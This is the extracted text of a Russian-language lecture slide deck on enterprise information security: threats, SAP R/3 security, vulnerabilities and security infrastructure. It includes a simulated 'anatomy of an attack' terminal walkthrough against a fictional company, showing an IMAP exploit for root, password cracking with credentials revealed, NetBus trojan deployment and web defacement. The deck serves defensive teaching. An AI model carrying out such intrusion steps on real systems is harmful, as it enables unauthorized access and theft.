Рост угроз Подбор паролей Вирусы Перебор паролей Использование уязвимостей Запрет аудита «Троянские кони» Перехват сессий Sweepers Sniffers Stealth-сканирование Подмена пакета GUI Low High Сложность средства атаки Уровень знаний хакеров 2000
МСЭ сервер Web сервер Роутер Рабочие станции Сеть Сервера Типовая схема сегмента корпоративной сети
Приложение масштаба предприятия Приложение масштаба предприятия Приложение масштаба предприятия различные платформы различные платформы использование Internet использование Internet разное ПО и аппаратура разное ПО и аппаратура различные пользователи различные пользователи масштабность масштабность интеграция в технологию обработки информации интеграция в технологию обработки информации Результат Результат Данные и системы могут быть: Данные и системы могут быть: выведены из строя выведены из строя украдены украдены несанкционированно изменены несанкционированно изменены
Особенности приложений масштаба предприятия Внешние и внутренние злоумышленники Управление безопасностью сосредоточено в разных руках: администраторы безопасности администраторы баз данных системные и сетевые администраторы Web-мастера Ограниченные ресурсы на обеспечение безопасности
Пример приложений масштаба предприятия: SAP SAP SAP R/3 Клиент Приложение R/3 Серверная ОС База данных R/3 Серверная ОС WinNT Workstation NT или Unix MS SQL Server или Sybase NT или Unix TCP/IP SAP R/3 Клиент Неправильная конфигурация Пароли Неиспользуемые сервисы Модемы Права доступа к файлам Shared-ресурсы Антивирусы Безопасность PC Приложение R/3 Серверная ОС Безопасность сервера приложения Пароли Неиспользуемые сервисы Права доступа к файлам Установленные патчи Журналы аудита База данных R/3 Аутентификация Авторизация Контроль целостности Соответствие Y2K Троянские кони Несанкционированный доступ Безопасность БД База данных R/3 Серверная ОС Безопасность ОС сервера Пароли Неиспользуемые сервисы Права доступа к файлам Установленные патчи Журналы аудита Безопасность сети Мониторинг всего трафика Обнаружение НСД Оповещение об атаках Завершение атаки Автоматическая реконфигура- ция сетевого оборудования
Интервал безопасности Интервал увеличивается Желатель ный уровень защищен ности Реальный уровень защищенно сти Время Если ничего не делать…
Интервал безопасности Время Реальный уровень Цель управления безопасностью Уменьшение интервала Желатель ный уровень защищен ности Реальный уровень защищенно сти Интервал
Традиционные средства защиты
Компоненты системы безопасности ИНФРАСТРУКТУРА БЕЗОПАСНОСТИ Access Control Authentication Encryption Virus/Content Security
Инфраструктура безопасности ИНФРАСТРУКТУРА БЕЗОПАСНОСТИ Access Control Authentication Encryption Virus/Content Security Access Control Контроль доступа Routers Firewalls
Инфраструктура безопасности ИНФРАСТРУКТУРА БЕЗОПАСНОСТИ Access Control Authentication Encryption Virus/Content Security ID Аутентификация ID Johnsmith ************ Admin
Инфраструктура безопасности ИНФРАСТРУКТУРА БЕЗОПАСНОСТИ Access Control Authentication Encryption Virus/Content Security Шифрование PKI SSL 85urtiowjeuqp i9476ljbmvnxkdkbmg 85urtiowjeuqp i9476ljbmvnx 8573urtiowjeuqp082 memo
Уязвимости Любая характеристика или свойство информационной системы, использование которой нарушителем может привести к реализации угрозы. ошибки в программах; человеческие ошибки и неправильная конфигурация разрешенный, но неиспользуемый сервис восприимчивость к атакам типа «отказ в обслуживании» ошибки при проектировании
Угрозы и атаки Атака - любое действие нарушителя, которое приводит к реализации угрозы путем использования уязвимостей информационной системы. Угроза - потенциально возможное событие, действие или процесс, которое посредством воздействия на компоненты информационной системы может привести к нанесению ущерба.
Информационная инфраструктура ПРИЛОЖЕНИЯ БД ОС СЕТЕВЫЕ УСЛУГИ
Анатомия атаки
bigwidget.com
Record last updated on 29-Jun-98. Record created on 30-Jun-94. Database last updated on 13-Oct-98 06:21:01 EDT. Domain servers in listed order: EHECATL. BIGWIDGET NS1.SPRINTLINK.NET NS.COMMANDCORP.COM Registrant: BigWidget, Conglomerated. (BWC2-DOM) 1234 Main Street Anytown, GA USA Domain Name: bigwidget.com Administrative Contact, Technical Contact, Zone Contact: BigWidget Admin (IA338-ORG) Phone Fax Billing Contact: BigWidget Billing (IB158-ORG) Phone Fax BIGWIDGET.COM
~$ telnet bigwidget.com 25 Trying Connected to bigwidget.com Escape character is '^]'. hacker: hacker:~$ Connection closed by foreign host. telnet bigwidget.com 143 Trying Connected to bigwidget.com. * OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct :51: (EDT) (Report problems in this server to logout * BYE bigwidget IMAP4rev1 server terminating connection. OK LOGOUT completed Connection closed by foreign host.
imap
imap
hacker ~$./imap_exploit bigwidget.com IMAP Exploit for Linux. Author: Akylonius Modifications: p1 Completed successfully. hacker ~$ telnet bigwidget.com Trying Connected to bigwidget.com. Red Hat Linux release 4.2 (Biltmore) Kernel on an i686 root bigwidget:~# whoami root bigwidget:~# cat./hosts localhost localhost.localdomain thevault accounting fasttalk sales geekspeak engineering people human resources thelinks marketing thesource information systems bigwidget:~# cd /etc rlogin thevault login:
Allan B. Smith /99 Donna D. Smith /98 Jim Smith /01 Joseph L.Smith /02 Kay L. Smith /03 Mary Ann Smith /01 Robert F. Smith /99 thevault:~# cat visa.txt cd /data/creditcards crack /etc/passwd Cracking /etc/passwd... username: bobman password: nambob username: mary password: mary username: root password: ncc1701 thevault:~# ftp thesource Connected to thesource 220 thesource Microsoft FTP Service (Version 4.0). Name: administrator 331 Password required for administrator. Password: ******* 230 User administrator logged in. Remote system type is Windows_NT.
ftp> cd \temp 250 CDW command successful. ftp> send netbus.exe local: netbus.exe remote: netbus.exe 200 PORT command successful. 150 Opening BINARY mode data connection for netbus.exe 226 Transfer complete. ftp> quit thevault:~$ telnet thesource Trying Connected to thesource.bigwidget.com. Escape character is '^]'. Microsoft (R) Windows NT (TM) Version 4.00 (Build 1381) Welcome to MS Telnet Service Telnet Server Build login: administrator password: ******* *=============================================================== Welcome to Microsoft Telnet Server. *=============================================================== C:\> cd \temp C:\TEMP> netbus.exe
Connected to the.source.bigwidget.com NetBus 1.6, by cf Screendump David Smith My Raise Dear Mr. Smith I would like to thank you for the huge raise that you have seen fit to give me. With my new salary of $350, a year I am sure I am the highest paid mail clerk in the company. This really makes me feel good because I deserve it. Your Son, Dave David Smith
Сеть BigWidget UNIX Firewall сервер Web сервер Router NT Рабочие станции сеть UNIX NTUNIX imap Crack NetBus
c:\> ftp webcentral Connected to webcentral 220 webcentral Microsoft FTP Service (Version 4.0). Name: jsmith 331 Password required for jsmith. Password: ******* 230 User jsmith logged in. Remote system type is Windows_NT. ftp> send index.html local: bigwedgie.html remote: index.html 200 PORT command successful. 150 Opening BINARY mode data connection for index.html 226 Transfer complete. ftp> quit 200 PORT command successful. 150 Opening ASCII mode data connection for /bin/ls. total 10 -rwxr-xr-x 9 jsmith jsmith 1024 Aug 17 17:07. -rwxr-xr-x 9 root root 1024 Aug 17 17:07.. -rwxr-xr-x 2 jsmith jsmith 2034 Aug 17 17:07 index.html -rwxr-xr-x 2 jsmith jsmith 1244 Aug 17 17:07 image1.gif -rwxr-xr-x 2 jsmith jsmith Aug 17 17:07 image2.gif -rwxr-x--x 6 jsmith jsmith 877 Aug 17 17:07 title.gif -rwxr-xr-x 2 jsmith jsmith 1314 Aug 17 17:07 bigwidget.jpg -rwxr-xr-x 2 jsmith jsmith 1824 Aug 17 17:07 page2.html 226 Transfer complete. bytes received in 0.82 seconds (0.76 Kbytes/sec) ftp> dir
UNIX Firewall сервер Web сервер Router NT Рабочие станции Сеть UNIX NTUNIX
Вопросы